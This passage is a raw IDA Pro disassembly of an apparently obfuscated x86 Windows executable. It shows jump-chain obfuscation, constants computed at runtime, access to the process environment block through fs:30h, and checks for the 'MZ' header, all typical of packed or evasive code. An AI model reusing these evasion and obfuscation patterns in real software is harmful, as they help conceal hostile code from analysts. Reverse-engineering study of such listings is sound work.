loc_426F5E: ; CODE XREF: sub_42AA5F-6C8�j
jmp loc_423CD2
; END OF FUNCTION CHUNK FOR sub_42AA5F
; ---------------------------------------------------------------------------
db 0F5h
dword_426F64 dd 6332E8E6h, 0D8645C6Ch ; DATA XREF: sub_426F9E:loc_425ADD�o
; sub_421656:loc_426F8C�o
; ---------------------------------------------------------------------------
sbb eax, [eax]
; START OF FUNCTION CHUNK FOR sub_429A83
loc_426F6E: ; CODE XREF: sub_429A83-1214�j
jmp loc_423EEE
; END OF FUNCTION CHUNK FOR sub_429A83
; ---------------------------------------------------------------------------
db 0CEh
dword_426F74 dd 77F50000h ; DATA XREF: sub_421656+449A�w
; sub_421656:loc_428468�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C24F
loc_426F78: ; CODE XREF: sub_42C24F-770B�j
jmp loc_4258A3
; END OF FUNCTION CHUNK FOR sub_42C24F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_426F7D: ; CODE XREF: sub_423F55+3EB2�j
xor eax, eax
mov [ebp-0Ch], eax
call sub_421DC4
loc_426F87: ; CODE XREF: sub_42BB39-AAD1�j
jmp loc_426EFB
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421656
loc_426F8C: ; CODE XREF: sub_421656:loc_42517F�j
mov eax, offset dword_426F64
call sub_428AE1
lea eax, [ebp-14h]
jmp loc_425AEA
; END OF FUNCTION CHUNK FOR sub_421656
; =============== S U B R O U T I N E =======================================
sub_426F9E proc near ; CODE XREF: sub_429BC2�j
; FUNCTION CHUNK AT 00422175 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00424BBE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425ADD SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00429F32 SIZE 00000005 BYTES
push ebp
jmp loc_429F32
sub_426F9E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop ebp
not esi
jmp sub_424B8F
; ---------------------------------------------------------------------------
loc_426FAC: ; DATA XREF: _94j21ax3:loc_427256�o
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call eax
push edx
push 13C7CB89h
pop edx
xor edx, 6853C7Dh
jmp loc_421C8E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_426FC9: ; CODE XREF: sub_42B9CF-156D�j
test edx, edi
jmp loc_42BA45
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
loc_426FD0: ; CODE XREF: _94j21ax3:0042C268�j
cmp ecx, 0F40B356Fh
jmp loc_4227C5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_89. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424DB4
loc_426FDC: ; CODE XREF: sub_424DB4+6�j
jmp nullsub_44
; END OF FUNCTION CHUNK FOR sub_424DB4
; =============== S U B R O U T I N E =======================================
sub_426FE1 proc near ; DATA XREF: sub_4220FC+9�o
; FUNCTION CHUNK AT 004224B5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425B9B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00429705 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042A3BD SIZE 0000000C BYTES
mov al, 1
shl al, cl
mov edx, [ebp-18h]
shr edx, 3
mov ecx, ds:dword_429F74
or [ecx+edx], al
jmp loc_4224B5
sub_426FE1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
or ebx, 0EBEAF4BAh
jmp sub_42510A
; =============== S U B R O U T I N E =======================================
sub_427004 proc near ; CODE XREF: sub_426612:loc_42B43A�j
; FUNCTION CHUNK AT 004214F8 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00427D34 SIZE 00000018 BYTES
add esp, 0FFFFFFECh
cmp ds:dword_4256CC, 0
jnz loc_42905F
lea edx, [ebp-14h]
mov eax, (offset loc_4256D7+1)
jmp loc_4214F8
sub_427004 endp
; =============== S U B R O U T I N E =======================================
sub_427021 proc near ; CODE XREF: sub_428993:loc_4234B2�j
; sub_42A8BB:loc_426DE1�p
xchg edx, [esp+0]
pop edx
rol eax, 6
push eax
call sub_423F43
retn
sub_427021 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421F28
loc_42702F: ; CODE XREF: sub_421F28+C�j
jz loc_42790D
jmp loc_42BCAB
; END OF FUNCTION CHUNK FOR sub_421F28
; =============== S U B R O U T I N E =======================================
sub_42703A proc near ; DATA XREF: sub_4252BD+16�o
mov [ecx+0B8h], eax
pop ecx
xor eax, eax
retn
sub_42703A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BA8A
loc_427044: ; CODE XREF: sub_42BA8A+7�j
mov [esp+4+var_4], ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
loc_42704D: ; CODE XREF: _94j21ax3:loc_4284B0�j
jmp loc_425A77
; END OF FUNCTION CHUNK FOR sub_42BA8A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_427052: ; CODE XREF: sub_423324:loc_4233FB�j
mov esi, eax
jle loc_42A5C8
jmp loc_42AA3E
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423614
loc_42705F: ; CODE XREF: sub_423614:loc_42228D�j
add edx, ebp
add edx, 4CF06052h
mov edx, [edx]
popf
mov byte ptr [eax+edx], 0
inc dword ptr [ebp-4]
jmp loc_423465
; END OF FUNCTION CHUNK FOR sub_423614
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_427076: ; CODE XREF: sub_42B9CF:loc_42C4B1�j
rol edx, 10h
add edx, 96EB29A8h
xchg edx, [esp+0]
; END OF FUNCTION CHUNK FOR sub_42B9CF
; START OF FUNCTION CHUNK FOR sub_42484C
loc_427082: ; CODE XREF: sub_42484C-120E�j
jmp sub_42AC17
; END OF FUNCTION CHUNK FOR sub_42484C
; =============== S U B R O U T I N E =======================================
sub_427087 proc near ; CODE XREF: sub_422973:loc_425210�p
; _94j21ax3:0042C0FF�j
arg_4 = dword ptr 8
mov [esp+0], ecx
pop ecx
pop ecx
mov ebp, offset nullsub_2
xchg ebp, [esp-8+arg_4]
locret_427094: ; CODE XREF: sub_421CAA:loc_4280C7�j
retn
sub_427087 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425819
loc_427095: ; CODE XREF: sub_425819+60D4�j
jmp loc_425A5A
; END OF FUNCTION CHUNK FOR sub_425819
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A7A6
loc_42709A: ; CODE XREF: sub_42A7A6:loc_42843E�j
and ecx, 0AE7A8ADBh
add ecx, 0F617B31Fh
xchg ecx, [esp+0]
jmp loc_428509
; END OF FUNCTION CHUNK FOR sub_42A7A6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_4270AE: ; CODE XREF: sub_42284F+87C�j
adc ebx, eax
loc_4270B0: ; CODE XREF: sub_42284F:loc_42236A�j
push 0E072C497h
pop eax
add eax, 8199EED6h
add eax, ebp
add eax, 9DF34A24h
cmp dword ptr [eax], 47424454h
jmp loc_4256A1
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ABCE
loc_4270CF: ; CODE XREF: sub_42ABCE:loc_42C49C�j
push offset sub_4252DD
jmp nullsub_197
; END OF FUNCTION CHUNK FOR sub_42ABCE
; ---------------------------------------------------------------------------
loc_4270D9: ; DATA XREF: sub_42771C:loc_4231D7�o
pop ebp
mov eax, ds:dword_42C230
call sub_421822
; START OF FUNCTION CHUNK FOR sub_42C5CD
loc_4270E5: ; CODE XREF: sub_42C5CD+B�j
jmp nullsub_200
; END OF FUNCTION CHUNK FOR sub_42C5CD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB39
loc_4270EA: ; CODE XREF: sub_42BB39+7�j
jmp loc_4271FD
; END OF FUNCTION CHUNK FOR sub_42BB39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_4270EF: ; CODE XREF: sub_42284F:loc_42A46E�j
jz loc_422A9C
jmp loc_429E74
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
pushf
jmp loc_42837B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421B3A
loc_427100: ; CODE XREF: sub_421B3A+23�j
mov [ebp-0Ch], eax
; END OF FUNCTION CHUNK FOR sub_421B3A
; START OF FUNCTION CHUNK FOR sub_422048
loc_427103: ; CODE XREF: sub_422048+2E2�j
; _94j21ax3:loc_424B71�j ...
mov eax, [ebp-0Ch]
mov esp, ebp
pop ebp
jmp loc_42281D
; END OF FUNCTION CHUNK FOR sub_422048
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422973
loc_42710E: ; CODE XREF: sub_422973+3AC4�j
push 0DD4550C6h
pop edx
jmp sub_42B65F
; END OF FUNCTION CHUNK FOR sub_422973
; ---------------------------------------------------------------------------
cmp eax, 0B73FA1CFh
jmp loc_422EFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_427124: ; CODE XREF: sub_42169F:loc_424A42�j
add ecx, esi
sbb ecx, 2A779557h
jmp loc_427DAC
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
loc_427131: ; CODE XREF: _94j21ax3:004279AC�j
mov ebp, esp
push eax
push offset sub_425819
jmp locret_4227A1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A9D8
loc_42713E: ; CODE XREF: sub_42A9D8+A�j
mov al, [esi]
pop esi
pop ecx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42A9D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423C3E
loc_427144: ; CODE XREF: sub_423C3E+71CB�j
jmp loc_4280D3
; END OF FUNCTION CHUNK FOR sub_423C3E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42982D
loc_427149: ; CODE XREF: sub_42982D-4CDE�j
jmp loc_422628
; END OF FUNCTION CHUNK FOR sub_42982D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4210C7
loc_42714E: ; CODE XREF: sub_4210C7+B�j
jmp nullsub_163
; END OF FUNCTION CHUNK FOR sub_4210C7
; ---------------------------------------------------------------------------
loc_427153: ; CODE XREF: _94j21ax3:00422127�j
mov esp, ebp
pop ebp
jmp loc_424A87
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_42715B: ; CODE XREF: sub_42169F:loc_42A6A8�j
push offset loc_422CB4
jmp nullsub_111
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_427165: ; CODE XREF: sub_423324:loc_423349�j
xor ecx, edi
rol ebp, 19h
jmp loc_4212C5
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
or edi, 0E3308C48h
ror ebx, 1Ch
jmp sub_4276A3
; ---------------------------------------------------------------------------
push ecx
push 601C9105h
pop ecx
add ecx, ds:4000F6h
test ecx, 4
jmp loc_4275D5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424320
loc_427195: ; CODE XREF: sub_424320:loc_42432B�j
jz loc_423DCB
jmp loc_424FAB
; END OF FUNCTION CHUNK FOR sub_424320
; =============== S U B R O U T I N E =======================================
sub_4271A0 proc near ; DATA XREF: sub_422048:loc_429ED1�o
; FUNCTION CHUNK AT 004282F2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AEA5 SIZE 00000008 BYTES
add eax, 18h
mov [ebp-10h], eax
loc_4271A6: ; CODE XREF: sub_42C364+4�j
jmp loc_4282F2
sub_4271A0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422048
loc_4271AB: ; CODE XREF: sub_422048+238B�j
push offset sub_423B04
jmp loc_423410
; END OF FUNCTION CHUNK FOR sub_422048
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4221B8
loc_4271B5: ; CODE XREF: sub_4221B8:loc_42416F�j
; sub_4221B8+5DDD�j
push esi
push 37DD8FAh
pop esi
sub esi, 5F86B737h
add esi, 5C4B5C8Eh
xchg esi, [esp+0]
jmp sub_4210AA
; END OF FUNCTION CHUNK FOR sub_4221B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_4271D0: ; CODE XREF: sub_4272E9:loc_4210DD�j
xchg esi, [ecx]
jnp loc_42256D
adc esi, edi
pop edi
jmp loc_4246EA
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427668
loc_4271E0: ; CODE XREF: sub_427668-3171�j
jl loc_42129F
test edi, 58A19FFFh
jmp loc_427EE5
; END OF FUNCTION CHUNK FOR sub_427668
; =============== S U B R O U T I N E =======================================
sub_4271F1 proc near ; CODE XREF: sub_423324-177�j
; sub_428180+A�p
arg_0 = dword ptr 4
mov [esp+0], eax
loc_4271F4: ; CODE XREF: _94j21ax3:loc_42B57F�j
pop eax
xchg edx, [esp-4+arg_0]
loc_4271F8: ; CODE XREF: sub_42A0CC-7ED�j
jmp sub_421689
sub_4271F1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB39
loc_4271FD: ; CODE XREF: sub_42BB39:loc_4270EA�j
jns sub_427D15
call sub_42A358
loc_427208: ; CODE XREF: sub_42C03F-E6A�j
jmp loc_428874
; END OF FUNCTION CHUNK FOR sub_42BB39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AADB
loc_42720D: ; CODE XREF: sub_42AADB+13�j
call sub_426612
mov edx, 8CB242DAh
call sub_4239A5
push eax
ror eax, 0Fh
push offset loc_429F1C
jmp nullsub_124
; END OF FUNCTION CHUNK FOR sub_42AADB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422538
loc_42722A: ; CODE XREF: sub_422538:loc_424E8E�j
push ecx
mov ecx, edi
call sub_42BEDC
; END OF FUNCTION CHUNK FOR sub_422538
; START OF FUNCTION CHUNK FOR sub_424775
loc_427232: ; CODE XREF: sub_424775+21A0�j
jmp loc_426A70
; END OF FUNCTION CHUNK FOR sub_424775
; ---------------------------------------------------------------------------
cmp eax, 0A852CFBh
jmp loc_4278F4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_174. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_427243: ; DATA XREF: sub_428A90-7218�o
mov eax, [ebp-4]
cmp word ptr [eax], 5A4Dh
jnz loc_423E68
jmp loc_428B2E
; ---------------------------------------------------------------------------
loc_427256: ; CODE XREF: _94j21ax3:loc_42839D�j
; _94j21ax3:0042A322�j
push offset loc_426FAC
jmp locret_421859
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_427260: ; CODE XREF: sub_423324+6799�j
push esi
mov esi, eax
xchg esi, [esp+28h+var_28]
call sub_42B83A
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jz loc_421933
jmp loc_42BABD
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
loc_42727D: ; CODE XREF: _94j21ax3:0042A9D1�j
xor eax, edx
jmp loc_4228CA
; ---------------------------------------------------------------------------
lea eax, sub_42131B
mov [ebp-4], eax
call sub_429974
mov ds:dword_423454, eax
xor eax, eax
jmp loc_424369
; ---------------------------------------------------------------------------
loc_42729E: ; DATA XREF: sub_42BD30+6�o
add ecx, 7A1050F6h
xchg ecx, [esp]
jmp sub_425A09
; ---------------------------------------------------------------------------
loc_4272AC: ; DATA XREF: _94j21ax3:004277CB�o
push eax
jmp loc_42A6A3
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4272B2 proc near ; CODE XREF: sub_429DCC�j
; FUNCTION CHUNK AT 00425389 SIZE 0000000C BYTES
push ebp
mov ebp, esp
xchg ecx, esi
push eax
jmp loc_425389
sub_4272B2 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_204. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB72
loc_4272BE: ; CODE XREF: sub_42AB72+7�j
jmp nullsub_128
; END OF FUNCTION CHUNK FOR sub_42AB72
; =============== S U B R O U T I N E =======================================
sub_4272C3 proc near ; CODE XREF: start�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00422DC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004251E3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A207 SIZE 0000000E BYTES
push ecx
push 0E08E1DEBh
loc_4272C9: ; CODE XREF: sub_423F55:loc_4297CE�j
pop ecx
sub ecx, 439D42EEh
rol ecx, 4
jmp loc_4251E3
sub_4272C3 endp
; =============== S U B R O U T I N E =======================================
sub_4272D8 proc near ; DATA XREF: sub_429DE9+6�o
; FUNCTION CHUNK AT 0042365C SIZE 00000012 BYTES
add edi, 1F434BD5h
mov [edi], eax
pop edi
loc_4272E1: ; CODE XREF: sub_42B9CF:loc_42945F�j
mov eax, [ebp-4]
jmp loc_42365C
sub_4272D8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4272E9 proc near ; DATA XREF: sub_42A3EE+6�o
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004210DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00421242 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042126C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00421547 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00422522 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004227DC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00422B06 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00422BE9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00422C0E SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00422DA2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004232E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423846 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00423A72 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004246EA SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0042513D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004251C3 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004255D1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042591C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00425B39 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00426DF2 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004271D0 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004273DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427698 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004279B1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427B16 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00428ADC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004292E1 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042969F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042976D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004297BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429FD5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042A4BD SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042A573 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042B5A6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B9E3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C26D SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0042C34E SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042C46E SIZE 00000005 BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
jmp loc_42126C
sub_4272E9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_4272F4: ; CODE XREF: sub_422EB0+90BC�j
sbb ebp, eax
xor eax, edi
; END OF FUNCTION CHUNK FOR sub_422EB0
; START OF FUNCTION CHUNK FOR sub_42284F
loc_4272F8: ; CODE XREF: sub_422EB0+5A78�j
; sub_422EB0+5A81�j ...
jz loc_42485B
cmp dword ptr [ebp-4], 5
jmp loc_42A930
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4221B8
loc_427307: ; CODE XREF: sub_4221B8:loc_429017�j
; _94j21ax3:0042902D�j
xor eax, 4B54D7B2h
add eax, 24E4CA82h
xchg eax, [esp+0]
jmp sub_4247A2
; END OF FUNCTION CHUNK FOR sub_4221B8
; ---------------------------------------------------------------------------
push eax
push offset sub_423EA4
jmp locret_429108
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BFF0
loc_427326: ; CODE XREF: sub_42BFF0+11�j
jz loc_4258F6
mov eax, ds:dword_42C488
mov eax, [eax]
mov ds:dword_42C48C, eax
xor eax, eax
mov ds:dword_42C488, eax
jmp loc_4258F6
; END OF FUNCTION CHUNK FOR sub_42BFF0
; =============== S U B R O U T I N E =======================================
sub_427344 proc near ; CODE XREF: sub_424B01:loc_4299FE�j
; sub_42BFF0�j
; FUNCTION CHUNK AT 0042554C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00425BC8 SIZE 00000005 BYTES
push ebp
jmp loc_425BC8
sub_427344 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421CAA
loc_42734A: ; CODE XREF: sub_421CAA+92A�j
add eax, 0FBFFC634h
call sub_42921C
push offset loc_42A41B
jmp loc_4230C4
; END OF FUNCTION CHUNK FOR sub_421CAA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_42735F: ; CODE XREF: sub_42484C:loc_423AB1�j
cmp dword ptr [ebp-14h], 6
setz al
jmp loc_42AA26
; ---------------------------------------------------------------------------
loc_42736B: ; CODE XREF: sub_42484C:loc_427AF8�j
cmp dword ptr [ebp-10h], 0
jnz loc_429C57
mov eax, [ebp+8]
call sub_42ADA2
loc_42737D: ; CODE XREF: _94j21ax3:loc_42C38E�j
test edi, ebp
jmp loc_423637
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_427384: ; CODE XREF: sub_42C0BC-7B7E�j
pop large dword ptr fs:0
add esp, 4
mov eax, 50h
push ebx
push 7BC8DD6Fh
jmp loc_42C588
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
loc_42739E: ; CODE XREF: _94j21ax3:004235DA�j
push 1E997FBEh
cmp ecx, 2F2E9A89h
jmp loc_424AA8
; =============== S U B R O U T I N E =======================================
sub_4273AE proc near ; CODE XREF: sub_4244BB+1�p
; _94j21ax3:00428013�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00426BCF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042752B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427FB6 SIZE 0000000E BYTES
mov [esp+0], edi
pop edi
push 1BD8CCEDh
pop edi
xor edi, 0FAB03A31h
jmp loc_426BCF
sub_4273AE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
call sub_42574E
mov edx, 0CE3062ECh
call sub_4239A5
call sub_422058
; START OF FUNCTION CHUNK FOR sub_42C473
loc_4273D7: ; CODE XREF: sub_42C473+E�j
jmp loc_42AE93
; END OF FUNCTION CHUNK FOR sub_42C473
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_4273DC: ; CODE XREF: sub_4272E9+42C3�j
jmp loc_422DA2
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
loc_4273E1: ; CODE XREF: _94j21ax3:0042943C�j
jmp loc_428AEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_4273E6: ; CODE XREF: sub_42169F+5339�j
jmp loc_422D86
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422392
loc_4273EB: ; CODE XREF: sub_422392+3�j
jmp loc_422CD3
; END OF FUNCTION CHUNK FOR sub_422392
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428954
loc_4273F0: ; CODE XREF: sub_428954:loc_428504�j
add eax, [edx+20h]
xor edx, edx
push edx
push eax
mov eax, [ebp-18h]
shl eax, 2
cdq
call sub_422F0A
loc_427403: ; CODE XREF: sub_4266F6+19EF�j
jmp nullsub_89
; END OF FUNCTION CHUNK FOR sub_428954
; ---------------------------------------------------------------------------
loc_427408: ; CODE XREF: _94j21ax3:loc_423827�j
jl loc_4284B6
; START OF FUNCTION CHUNK FOR sub_42B03C
loc_42740E: ; CODE XREF: sub_42B03C+F6C�j
jmp loc_423BB4
; END OF FUNCTION CHUNK FOR sub_42B03C
; ---------------------------------------------------------------------------
loc_427413: ; CODE XREF: _94j21ax3:004264A9�j
jmp loc_42AC55
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_427418: ; CODE XREF: sub_4221A3+10�j
jmp loc_42C125
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
and edx, edi
cmp ebp, 63FEBF38h
jmp loc_4225E0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_92. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42134B
loc_42742B: ; CODE XREF: sub_42134B+99E3�j
jmp loc_422582
; END OF FUNCTION CHUNK FOR sub_42134B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422C48
loc_427430: ; CODE XREF: sub_422C48+95AD�j
jl loc_428ACD
ror esi, 6
cdq
add esi, ebx
jmp loc_428AC7
; END OF FUNCTION CHUNK FOR sub_422C48
; ---------------------------------------------------------------------------
loc_427441: ; CODE XREF: _94j21ax3:loc_42AE1C�j
add eax, ebp
add eax, 17CE9550h
mov eax, [eax]
jo loc_42860B
add eax, 28h
push edx
push 23B57275h
jmp loc_42C3D6
; ---------------------------------------------------------------------------
loc_42745F: ; CODE XREF: _94j21ax3:00423A6D�j
jg loc_426772
push 0AE50DE8Ah
mov ebx, ebp
loc_42746C: ; CODE XREF: _94j21ax3:loc_424D26�j
xor eax, eax
push edx
push 0BC06A113h
pop edx
jmp loc_424C93
; ---------------------------------------------------------------------------
jmp loc_42183B
; ---------------------------------------------------------------------------
jmp loc_429365
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_427484: ; CODE XREF: sub_42C0BC:loc_42A403�j
mov eax, large fs:30h
push edx
push 0B70BAD6Bh
pop edx
jmp loc_423F75
; END OF FUNCTION CHUNK FOR sub_42C0BC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_158. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421047
loc_427498: ; CODE XREF: sub_421047+98AD�j
jmp nullsub_116
; END OF FUNCTION CHUNK FOR sub_421047
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422A20
loc_42749D: ; CODE XREF: sub_422A20:loc_422414�j
xor eax, 0CFBB1E0Eh
add eax, ebp
add eax, 115AE740h
push eax
push offset sub_427A68
loc_4274B1: ; CODE XREF: _94j21ax3:loc_4254A8�j
jmp loc_4282EB
; END OF FUNCTION CHUNK FOR sub_422A20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429447
loc_4274B6: ; CODE XREF: sub_429447:loc_424293�j
xchg ecx, [esp-4+arg_0]
retn
; END OF FUNCTION CHUNK FOR sub_429447
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_4274BA: ; CODE XREF: sub_42A0CC+AA1�j
jmp loc_423F69
; END OF FUNCTION CHUNK FOR sub_42A0CC
; =============== S U B R O U T I N E =======================================
sub_4274BF proc near ; DATA XREF: sub_429447-6F67�o
pop ebp
retn 4
sub_4274BF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_4274C3: ; CODE XREF: sub_42284F-92E�j
jmp nullsub_64
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422C48
loc_4274C8: ; CODE XREF: sub_422C48+13�j
xchg ebp, ebx
push ebx
jmp loc_425A17
; END OF FUNCTION CHUNK FOR sub_422C48
; ---------------------------------------------------------------------------
jz nullsub_206
jmp loc_429224
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A56
loc_4274DB: ; CODE XREF: sub_423A56+8183�j
jnz loc_425847
jg loc_4289AE
jmp loc_4263E6
